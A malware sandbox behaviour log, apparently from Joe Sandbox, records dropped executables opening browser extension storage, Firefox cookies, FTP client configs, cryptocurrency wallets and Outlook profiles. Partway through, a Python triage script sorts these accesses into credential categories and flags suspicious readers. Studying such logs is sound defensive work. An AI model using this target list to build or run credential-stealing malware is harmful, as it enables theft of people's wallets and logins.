                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
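The rows above are the raw behaviour record; what an analyst wants from them is a per-process summary of which credential stores each dropped executable touched. The script below is an added example, not part of the Joe Sandbox report or of any tool the report describes. It parses rows of the form "Source: <process>File opened: <path>" (also "Key opened:" and "Directory queried:"), tolerating the glued "exeFile opened" form and the "Jump to behavior" link text that page extraction leaves on some rows, buckets each accessed path into a data category, and flags processes that run from %TEMP% or Roaming and read any of them. The category names, the regular expressions and the is_unexpected_reader() heuristic are my own assumptions; the sample rows are copied verbatim from this report.

```python
"""Triage helper for Joe Sandbox behaviour rows (added example, not report code).

Categories and patterns below are this example's own assumptions; they are
keyed on the paths seen in the report, not on a published signature set.
"""
import re
from collections import Counter, defaultdict

# One behaviour row. The process path and the event name may be glued together
# ("...exeFile opened:") and the row may end with "Jump to behavior" residue.
ROW_RE = re.compile(
    r"^\s*Source:\s*(?P<src>.+?\.exe)\s*"
    r"(?P<event>File opened|Key opened|Directory queried):\s*"
    r"(?P<target>.+?)\s*(?:Jump to behavior)?\s*$",
    re.IGNORECASE,
)

# Category -> regexes matched against the lower-cased target path/key.
CATEGORIES = {
    "chrome_extension_storage": [r"\\user data\\.*\\(?:local|sync) extension settings\\"],
    "browser_credentials_or_history": [
        r"\\login data", r"\\user data\\default\\history$", r"\\secure preferences$",
        r"\\cookies\.sqlite", r"\\places\.sqlite", r"\\prefs\.js$",
    ],
    "ftp_client_config": [
        r"\\ftpinfo", r"\\ftpgetter", r"\\ftpbox", r"\\filezilla\\",
        r"\\smartftp\\", r"\\ftprush", r"\\3d-ftp",
    ],
    "crypto_wallet": [
        r"\\exodus", r"\\ledger live", r"\\atomic\\", r"\\coinomi\\", r"\\bitcoin\\wallets",
        r"\\binance", r"\\com\.liberty\.jaxx", r"\\electrum", r"\\guarda", r"\\ethereum\\wallets",
    ],
    "outlook_mapi_profile": [r"\\windows messaging subsystem\\profiles\\"],
    "user_documents": [r"^c:\\users\\[^\\]+\\documents(?:\\|$)"],
}

# Sample rows copied from the report (the last one ends in a backslash, so it
# is written as a raw string plus an explicit "\\").
SAMPLE_ROWS = [
    r"Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp",
    r"Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account",
    r"Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js",
    r"Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences",
    r"Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml",
    r"Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\atomic" "\\",
    r"Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001",
    r"Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior",
]


def parse_row(line):
    """Return (source_process, event, target) or None for a non-matching line."""
    m = ROW_RE.match(line)
    if not m:
        return None
    return m.group("src"), m.group("event").lower(), m.group("target")


def categorize(target):
    """Sorted list of category names whose patterns match the target path/key."""
    t = target.lower()
    return sorted(name for name, pats in CATEGORIES.items()
                  if any(re.search(p, t) for p in pats))


def is_unexpected_reader(src):
    """Heuristic (assumption): a browser or wallet reads its own profile from
    Program Files, not from %TEMP% or a random Roaming subfolder."""
    s = src.lower()
    return "\\appdata\\local\\temp\\" in s or "\\appdata\\roaming\\" in s


def triage(lines):
    """Map each source process to {category: number of matching rows}."""
    summary = defaultdict(Counter)
    for line in lines:
        row = parse_row(line)
        if row is None:
            continue
        src, _event, target = row
        for cat in categorize(target):
            summary[src][cat] += 1
    return {src: dict(counts) for src, counts in summary.items()}


def flag(summary):
    """Sorted processes that both look out of place and touched sensitive data."""
    return sorted(src for src, cats in summary.items()
                  if cats and is_unexpected_reader(src))


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    for src in flag(result):
        print(src, result[src])
```

The heuristic keys on where the reader runs from, not only on the target: a real browser or wallet client opens exactly the same files, so the target path alone is not a detection. The Chrome "Local Extension Settings" entries are per-extension LevelDB stores; the report does not name the extensions behind those IDs, so the script groups them by path rather than guessing at the products.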
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe    Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe    Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe    Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe    Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe    Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe    Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe    Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe    Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe    Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe    Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\DUUDTUBZFW
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe    Directory queried: C:\Users\user\Documents\NWCXBPIUYI
